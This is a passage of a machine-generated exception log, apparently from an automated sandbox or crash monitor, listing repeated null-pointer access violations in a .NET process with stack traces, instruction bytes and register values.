__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13b8a94 0x13b832a 0x13b8215 0x13b6ab3 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514596 registers.edi: 4514940 registers.eax: 0 registers.ebp: 4514604 registers.edx: 0 registers.ebx: 4517572 registers.esi: 47015004 registers.ecx: 46084976	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13b84c9 0x13b832a 0x13b8215 0x13b6ab3 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514308 registers.edi: 4514608 registers.eax: 0 registers.ebp: 4514620 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13b8a94 0x13b832a 0x13b8215 0x13b6ab3 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514596 registers.edi: 4514940 registers.eax: 0 registers.ebp: 4514604 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 47514768	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bcfc0 0x13bce11 0x13b81fd 0x13b6d9c 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514284 registers.edi: 4514584 registers.eax: 0 registers.ebp: 4514596 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bd556 0x13bce11 0x13b81fd 0x13b6d9c 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514572 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514580 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 48949640	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bcfc0 0x13bce11 0x13b8215 0x13b6d9c 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514284 registers.edi: 4514584 registers.eax: 0 registers.ebp: 4514596 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bd556 0x13bce11 0x13b8215 0x13b6d9c 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514572 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514580 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 50299328	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bcfc0 0x13bce11 0x13b8215 0x13b6d9c 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514284 registers.edi: 4514584 registers.eax: 0 registers.ebp: 4514596 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bd556 0x13bce11 0x13b8215 0x13b6d9c 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514572 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514580 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 51649016	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bd8fa 0x13bd709 0x13b81fd 0x13b6eb4 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514336 registers.edi: 4514636 registers.eax: 0 registers.ebp: 4514648 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bdd62 0x13bd709 0x13b81fd 0x13b6eb4 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514624 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514632 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45847680 registers.ecx: 46512452	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bd8fa 0x13bd709 0x13b8215 0x13b6eb4 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514336 registers.edi: 4514636 registers.eax: 0 registers.ebp: 4514648 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bdd62 0x13bd709 0x13b8215 0x13b6eb4 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13bca8b registers.esp: 4514624 registers.edi: 4514964 registers.eax: 0 registers.ebp: 4514632 registers.edx: 0 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 48003248	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bd8fa 0x13bd709 0x13b8215 0x13b6eb4 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bf7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bf4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 10 ca f1 00 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x13b910a registers.esp: 4514336 registers.edi: 4514636 registers.eax: 0 registers.ebp: 4514648 registers.edx: 15845364 registers.ebx: 4517572 registers.esi: 45823660 registers.ecx: 0	1
__exception__ July 18, 2023, 7:16 a.m.	stacktrace: 0x13bca48 0x13bdd62 0x13bd709 0x13b8215 0x13b6eb4 0x13b5c49 0xa5d9ff 0xa57c1d 0xa572d3 0xa53c6b 0xa535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x724d2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724e264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724e2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725974ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72597610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72621dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72621e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72621f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7262416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b7f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 